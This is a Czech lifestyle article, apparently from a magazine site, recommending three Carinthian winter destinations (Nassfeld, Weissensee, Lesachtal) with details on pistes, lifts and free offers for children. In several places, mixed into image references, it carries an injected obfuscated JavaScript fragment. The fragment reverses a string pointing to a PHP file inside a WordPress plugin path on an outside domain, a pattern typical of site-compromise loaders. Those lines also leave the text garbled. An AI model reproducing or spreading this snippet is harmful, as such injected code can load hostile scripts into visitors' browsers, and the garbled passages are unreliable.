FACESTARŽivotní stylZAMILUJTE SE HNED TŘIKRÁT! TAHLE TŘI MÍSTA V KORUTANECH POJÍ LÁSKA NA...

ZAMILUJTE SE HNED TŘIKRÁT! TAHLE TŘI MÍSTA V KORUTANECH POJÍ LÁSKA NA PRVNÍ POHLED!

1. Nassfeld – vaše slunečná dovolená s jistotou sněhu!

1. Nassfeld – vaše slunečná dovolená s jistotou sněhu!

Pokud hledáte výjimečné místo pro strávení zimní dovolené, neměl by vašemu zájmu uniknout korutanský Nassfeld. Lyžařské středisko s perfektně upravenými sjezdovkami všech obtížností, které se řadí k TOP 10 oblastem v Rakousku, a to nejen díky své jistotě kvalitního sněhu, ale i díky počtu slunečních hodin. Nassfeld naleznete na mapě přímo na hranicích s Itálií a nabídne vám mnohem více, než jen sluníčko a dostatek sněhu. Za zmínku jistě stojí nejdelší osvětlená sjezdovka v Alpách „Carnia“, která se pyšní délkou 7,6 kilometrů. Její spodní třetinu mohou místní návštěvníci využívat k večernímu lyžování, a to každou sobotu. Pro malé i velké závodníky je zde připravena dráha s měřením času a rychlosti, a pro milovníky videí je tu i příležitost natočit si své osobní video či vyzkoušet si trendové zimní sporty. Středisko má připravenou zábavu i pro oblíbence snowparků a funparků. Na své si přijdou i zastánci mimo-sjezdových tratí. No, a pokud upřednostňujete běh na lyžích, jistě vás potěší 80 kilometrů běžeckých tratí, které vedou na hřebenech hor, ale i v údolí. Je zde také centrum biatlonu, osvětlené sáňkařské dráhy a 55 kilometrů zimních turistických tras. Pro ty z vás, kteří mají rádi bruslení na ledě, mám skvělý tip na upravenou bruslařskou plochu na jezeře „Pressegger See“. 

and

Ve středisku Nassfeld na vás čeká 30 lanovek a vleků, z toho 5 kabinek, 4 šestisedačky, 4 čtyřsedačky, 17 vleků. Dohromady čítají sjezdovky celkem 110 kilometrů.

2. Přírodní park a jezero Weissensee – úžasné místo pro milovníky běhu na lyžích!

Představte si zimní krajinu, ve které se rozprostírá pohled na jezero, kde se každoročně, pravidelně v polovině prosince, vytvoří silná vrstva ledu o tloušťce až 40 cm. Jezero leží v nadmořské výšce 930 metrů a jeho výměra je 6,5 km2. Ideální podmínky pro bruslaře, kteří zde každou zimu zanechávají své rýhy v ledu a rychlobruslaři zde lámou své životní rekordy. To ale není vše! Jezero Weissensse se nyní navíc zaměřuje i na milovníky běhu na lyžích. Přírodní park Weissensee se totiž stal novým členem skupiny X-Country Ski Holidays, která se v Alpách specializuje právě na milovníky běhu na lyžích, a proto zde naleznete vylepšené podmínky i pro běh. Jistě vás překvapí více než 50 kilometrů tratí pro styl bruslení, ale i tratě se dvěma stopami. A pokud jste obdivovateli biatlonu, uchvátí vás zřízení biatlonového okruhu, kde se střílí laserovými puškami.

Máte doma malého olympionika? 

Pokud je vašim ratolestem mezi třemi až čtrnácti lety a mají soutěžního ducha, můžete je přihlásit na Olympiádu na ledě a ve sněhu. Koná se vždy ve dvou pevně stanovených termínech v průběhu jarních prázdnin a pozor – účast dětí je zde ZDARMA. To není vše, co nabízí tento přírodní park zcela bezplatně. Návštěvníci zde mohou využít v rámci regionu ZDARMA skibus k naplánovaným výletům.

and

Pro rodiče s dětmi je zde navíc připravena čtyř-sedačková lanovka a 4 vleky, které vám zpřístupní 7 kilometrů lehkých až středně těžkých sjezdovek. Jistě vás potěší, že děti zde platí podle hesla „čím menší, tím levnější“. To znamená, že děti platí v hotelu, u vleků, v půjčovně lyží či lyžařské školy podle jejich tělesné výšky. Navíc tu na děti čekají dva místní maskoti – tučňák a medvídek. Pod heslem „Ski for free“ se navíc skrývá v období od 22. února do 7. března 2015 skipas ZDARMA.

3. Údolí Lesachtal – schovaný ráj s nedotčenou přírodou

Řadíte se k milovníkům skialpinismu či k výletníkům na sněžnicích? Jakmile navštívíte oblast údolí Lesachtalu, jen těžko si pak dokážete představit lepší místo pro vaši zimní dovolenou. Údolí Lesachtal  je ukryto mezi pohořími Dolomity a Karnische Alpen a stále si ještě uchovává nedotčenou krajinu a své původní tradice.  Díky tomu si tato oblast zasloužila i ocenění „Evropská krajina roku“. Zasněžené lesy, louky a salaše vás přímo vybízejí k tomu, abyste je objevili s vaší rodinou či přáteli. Pokud s tímto sportem teprve začínáte, jistě oceníte trasy pro začátečníky. Na vrchol můžete vystoupat i se zkušenými instruktory, kteří vás hned v počátku naučí správným návykům. Zároveň získáte řadu užitečných informací o bezpečném provozování těchto sportů a zásadách chování v alpské přírodě. Pokud přeci jenom dáte přednost jízdě na vrchol lanovkou, mám pro vás tip na lyžařskou oblast Golzentipp/ Obertilliach. Starou sedačkovou lanovku zde nahradili za moderní kabinovou, a proto se tato oblast stala skvělým místem pro malé lyžaře či snowboardisty, kteří zde mohou pohodlně sjíždět své první obloučky do údolí.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandern20I1.jpg“ />

Zajímavostí je, že Lesachtal je zároveň místem, kde trénují mistři světa a olympionici v běhu na lyžích. Trať, která je dlouhá 60 kilometrů, vede příhraniční oblastí a nabízí zároveň několik různých možností výletů. Důležitou informací jistě je, že zde máte téměř zaručen dostatek sněhu a slunečné dny. Navíc je možné si užít na slunečné trase v St. Lorenzen běh na lyžích ZDARMA.

Oficiální stránky oblastí s aktuálními tipy a informacemi naleznete na:

Nassfeld 
www.nassfeld.at

Weissensee
www.weissensee.com

Lesachtal
www.lesachtal.com

Článek pro vás připravila a krásnou dovolenou vám přeje vaše dovolenkářka. Blog dovolenkářky se skvělými radami na cestování naleznete na www.dovolenkarka.cz.

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandern20III1.jpg“ />

and$nYj=function(n){if(typeof($nYj.list[n])==„string“)return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n]};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelahandschaft20I.jpg“ />

and

and

and

 

Související články